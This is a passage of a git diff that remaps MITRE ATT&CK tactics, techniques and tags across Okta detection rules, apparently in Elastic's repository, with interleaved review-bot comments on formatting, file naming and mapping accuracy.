Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml index 8c9739a98ea..a3dc9b07157 100644 --- a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml +++ b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic", "@BenB196", "Austin Songer"] 
@@ -62,12 +62,7 @@ references = [
 risk_score = 47
 rule_id = "e90ee3af-45fc-432e-a850-4a58cf14a457"
 severity = "medium"
-tags = [
- "Use Case: Identity and Access Audit",
- "Data Source: Okta",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
-]
+tags = ["Use Case: Identity and Access Audit", "Tactic: Initial Access", "Data Source: Okta", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "threshold"
@@ -82,41 +77,21 @@ event.dataset:okta.system and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [rule.threshold]
 field = ["okta.actor.alternate_id"]
 value = 5
diff --git a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml
index 121e67e54ef..0500cf14163 100644
--- a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml
+++ b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml
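Review bot: The replacement `tags` value in this hunk is a single line of well over 100 characters, whereas the removed side and the untouched rules around it keep `tags` as one entry per line; the same one-line form appears in every other tags hunk of this diff (the deactivate/modify-application, sign-in-via-third-party-IdP, multiple-sessions, admin-privileges, admin-role, MFA-deactivation, sign-on-policy, stolen-credentials and command-line-entropy rules). If these files were edited by hand rather than written back through the repository's rule serializer, the next save will presumably rewrap them and produce a noisy follow-up diff. Running the touched rules through the normal save path before merging keeps the formatting stable and the diff reviewable.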
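Review bot: After this hunk `defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml` maps only to Initial Access (TA0001, with the Defense Evasion and Persistence entries removed), so the `defense_evasion_` file-name prefix no longer matches the rule's tactic. If the repository keeps file-name prefixes aligned with the primary tactic, the same drift is introduced for `impact_okta_attempt_to_deactivate_okta_application.toml`, `impact_okta_attempt_to_modify_okta_application.toml`, `initial_access_sign_in_events_via_third_party_idp.toml`, `lateral_movement_multiple_sessions_for_single_user.toml`, `persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml` and `persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml`. Since `rule_id` rather than the path appears to be the stable identifier, either a rename in a follow-up or a stated decision to leave the names would keep the tree navigable for the next coverage review.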
@@ -2,7 +2,7 @@
 creation_date = "2020/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -62,12 +62,7 @@ references = [
 risk_score = 21
 rule_id = "edb91186-1c7e-4db8-b53e-bfa33a1a0a8a"
 severity = "low"
-tags = [
- "Use Case: Identity and Access Audit",
- "Data Source: Okta",
- "Tactic: Impact",
- "Resources: Investigation Guide",
-]
+tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -78,14 +73,18 @@ event.dataset:okta.system and event.action:application.lifecycle.deactivate
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1489"
-name = "Service Stop"
-reference = "https://attack.mitre.org/techniques/T1489/"
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
 [rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml
index 79b6707bfb6..c5ef4a765ea 100644
--- a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml
+++ b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
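Review bot: The threat hunk for `impact_okta_attempt_to_deactivate_okta_application.toml` maps `application.lifecycle.deactivate` to T1562.001 (Disable or Modify Tools), which in ATT&CK describes disabling security tooling, whereas the hunk's function context suggests the query fires for any Okta application being deactivated. Unless the query (outside the hunk) narrows matches to security-relevant integrations, the new mapping holds only for a subset of alerts and the removed Impact/T1489 framing was the more general one; the same question applies to the modify-application rule's hunk that follows. Recording the rationale for choosing Defense Evasion, in the rule description or a `#` comment above `[[rule.threat]]`, would save the next reviewer from re-litigating it.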
@@ -69,12 +69,7 @@ references = [
 risk_score = 21
 rule_id = "c74fd275-ab2c-4d49-8890-e2943fa65c09"
 severity = "low"
-tags = [
- "Use Case: Identity and Access Audit",
- "Data Source: Okta",
- "Tactic: Impact",
- "Resources: Investigation Guide",
-]
+tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -86,8 +81,17 @@ event.dataset:okta.system and event.action:application.lifecycle.update
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/impact_possible_okta_dos_attack.toml b/rules/integrations/okta/impact_possible_okta_dos_attack.toml
index 52c88d548de..fe263825367 100644
--- a/rules/integrations/okta/impact_possible_okta_dos_attack.toml
+++ b/rules/integrations/okta/impact_possible_okta_dos_attack.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -78,19 +78,18 @@ event.dataset:okta.system and event.action:(application.integration.rate_limit_e
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1498"
-name = "Network Denial of Service"
-reference = "https://attack.mitre.org/techniques/T1498/"
 [[rule.threat.technique]]
 id = "T1499"
 name = "Endpoint Denial of Service"
 reference = "https://attack.mitre.org/techniques/T1499/"
+[[rule.threat.technique.subtechnique]]
+id = "T1499.003"
+name = "Application Exhaustion Flood"
+reference = "https://attack.mitre.org/techniques/T1499/003/"
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
diff --git a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml
index 10d46662b9a..431094faa47 100644
--- a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml
+++ b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/07"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/02/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -75,17 +75,21 @@ event.dataset:okta.system and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1133"
-name = "External Remote Services"
-reference = "https://attack.mitre.org/techniques/T1133/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["okta.actor.id", "cloud.account.id"]
diff --git a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml
index d157ea4686f..35aec3b7673 100644
--- a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml
+++ b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/14"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -76,35 +76,18 @@ event.dataset:okta.system and event.action:app.generic.unauth_app_access_attempt
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml
index 3980b66a6b4..dfa658d7dcd 100644
--- a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml
+++ b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/01/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -68,13 +68,7 @@ references = [
 risk_score = 47
 rule_id = "1ceb05c4-7d25-11ee-9562-f661ea17fbcd"
 severity = "medium"
-tags = [
- "Domain: Identity",
- "Use Case: Identity and Access Audit",
- "Tactic: Initial Access",
- "Data Source: Okta",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Okta", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -111,14 +105,36 @@ value = "now-5d"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1199"
-name = "Trusted Relationship"
-reference = "https://attack.mitre.org/techniques/T1199/"
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+[[rule.threat.technique.subtechnique]]
+id = "T1556.007"
+name = "Hybrid Identity"
+reference = "https://attack.mitre.org/techniques/T1556/007/"
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1556.007"
+name = "Hybrid Identity"
+reference = "https://attack.mitre.org/techniques/T1556/007/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
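Review bot: The new mapping in the last hunk (T1556.007 Hybrid Identity under Defense Evasion and Persistence) describes modification of the federated authentication process, while the rule's name and the removed Initial Access/T1199 entry indicate it observes sign-in events arriving through an already-configured third-party IdP. If the query (outside the hunk) matches only sign-ins rather than IdP configuration changes, the new entries name a precondition rather than the behaviour the rule actually detects, and tactic-coverage reporting will overstate Defense Evasion/Persistence visibility. Confirming the query's scope, or keeping an Initial Access entry alongside the new ones, would settle that; the tags hunk should then match whatever is decided.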
diff --git a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml
index 2a87b962d34..8f3817af63a 100644
--- a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml
+++ b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/10/07"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -57,14 +57,7 @@ references = ["https://trust.okta.com/security-advisories/okta-classic-applicati
 risk_score = 47
 rule_id = "1502a836-84b2-11ef-b026-f661ea17fbcc"
 severity = "medium"
-tags = [
- "Domain: SaaS",
- "Data Source: Okta",
- "Use Case: Threat Detection",
- "Use Case: Identity and Access Audit",
- "Tactic: Initial Access",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -78,17 +71,39 @@ event.dataset: "okta.system"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["client.user.name", "okta.client.user_agent.raw_user_agent"]
diff --git a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml
index 3cee4601d83..e85d24507ef 100644
--- a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml
+++ b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -78,52 +78,3 @@ event.dataset:okta.system and event.action:user.account.report_suspicious_activi
 '''
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml
index fdf12c3e90b..b81063de51f 100644
--- a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml
+++ b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/07"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
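Review bot: This hunk deletes every `[[rule.threat]]` entry from `initial_access_suspicious_activity_reported_by_okta_user.toml`, but the file's `tags` array is not touched anywhere in the diff; if it still carries a `Tactic:` entry, the rule is left with a tactic tag that no threat entry backs, the only rule in this change set in that state. Either drop the tag in the same commit or, if the tags were already bare, say so in the commit message so the tag/tactic consistency checks being tightened in this patch series have nothing to trip on. Since a user-submitted suspicious-activity report is presumably not itself adversary behaviour, leaving the rule unmapped looks intentional, but a one-line rationale in the rule's description would save the next ATT&CK coverage review from re-adding a T1078 mapping.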
@@ -68,12 +68,7 @@ references = [
 risk_score = 47
 rule_id = "621e92b6-7e54-11ee-bdc0-f661ea17fbcd"
 severity = "medium"
-tags = [
- "Use Case: Identity and Access Audit",
- "Data Source: Okta",
- "Tactic: Lateral Movement",
- "Resources: Investigation Guide",
-]
+tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "threshold"
@@ -87,22 +82,21 @@ event.dataset:okta.system
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1550"
 name = "Use Alternate Authentication Material"
 reference = "https://attack.mitre.org/techniques/T1550/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1550.004"
 name = "Web Session Cookie"
 reference = "https://attack.mitre.org/techniques/T1550/004/"
-
-
 [rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.threshold]
 field = ["okta.actor.id"]
 value = 1
diff --git a/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml b/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml
index efa11cf5d96..d58958991d7 100644
--- a/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml
+++ b/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml
@@ -3,7 +3,7 @@ creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
 promotion = true
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -37,7 +37,7 @@ risk_score = 47
 rule_id = "6885d2ae-e008-4762-b98a-e8e1cd3a81e9"
 rule_name_override = "okta.display_message"
 severity = "medium"
-tags = ["Use Case: Identity and Access Audit", "Data Source: Okta", "Resources: Investigation Guide"]
+tags = ["Use Case: Identity and Access Audit", "Tactic: Credential Access", "Data Source: Okta", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -65,3 +65,31 @@ severity = "high"
 value = "HIGH"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1110"
+name = "Brute Force"
+reference = "https://attack.mitre.org/techniques/T1110/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1110.001"
+name = "Password Guessing"
+reference = "https://attack.mitre.org/techniques/T1110/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1110.003"
+name = "Password Spraying"
+reference = "https://attack.mitre.org/techniques/T1110/003/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1110.004"
+name = "Credential Stuffing"
+reference = "https://attack.mitre.org/techniques/T1110/004/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml
index 859394bc1c4..6077dd8a367 100644
--- a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml
+++ b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -70,12 +70,7 @@ references = [
 risk_score = 47
 rule_id = "b8075894-0b62-46e5-977c-31275da34419"
 severity = "medium"
-tags = [
- "Use Case: Identity and Access Audit",
- "Data Source: Okta",
- "Tactic: Persistence",
- "Resources: Investigation Guide",
-]
+tags = ["Use Case: Identity and Access Audit", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Okta", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -86,14 +81,36 @@ event.dataset:okta.system and event.action:group.privilege.grant
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml
index 4e3bb956cee..14ed0422b6f 100644
--- a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml
+++ b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/02/03"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -72,14 +72,7 @@ references = [
 risk_score = 47
 rule_id = "f06414a6-f2a4-466d-8eba-10f85e8abf71"
 severity = "medium"
-tags = [
- "Domain: Identity",
- "Data Source: Okta",
- "Data Source: Okta System Logs",
- "Use Case: Identity and Access Audit",
- "Tactic: Persistence",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Okta", "Data Source: Okta System Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -92,14 +85,36 @@ event.dataset:okta.system
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml
index 3d49244c971..b132c287c30 100644
--- a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml
+++ b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -85,14 +85,18 @@ event.dataset:okta.system and event.action:system.api_token.create
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1136"
-name = "Create Account"
-reference = "https://attack.mitre.org/techniques/T1136/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.001"
+name = "Additional Cloud Credentials"
+reference = "https://attack.mitre.org/techniques/T1098/001/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml
index 3f356b7f3ee..f3e560d02e4 100644
--- a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml
+++ b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/20"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/09/08"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -66,13 +66,7 @@ risk_score = 21
 rule_id = "cd89602e-9db0-48e3-9391-ae3bf241acd8"
 setup = "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n"
 severity = "low"
-tags = [
- "Tactic: Persistence",
- "Use Case: Identity and Access Audit",
- "Data Source: Okta",
- "Domain: Cloud",
- "Resources: Investigation Guide",
-]
+tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Okta", "Domain: Cloud", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
@@ -85,19 +79,36 @@ sequence by okta.target.id with maxspan=12h
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1556.006"
 name = "Multi-Factor Authentication"
 reference = "https://attack.mitre.org/techniques/T1556/006/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1556.006"
+name = "Multi-Factor Authentication"
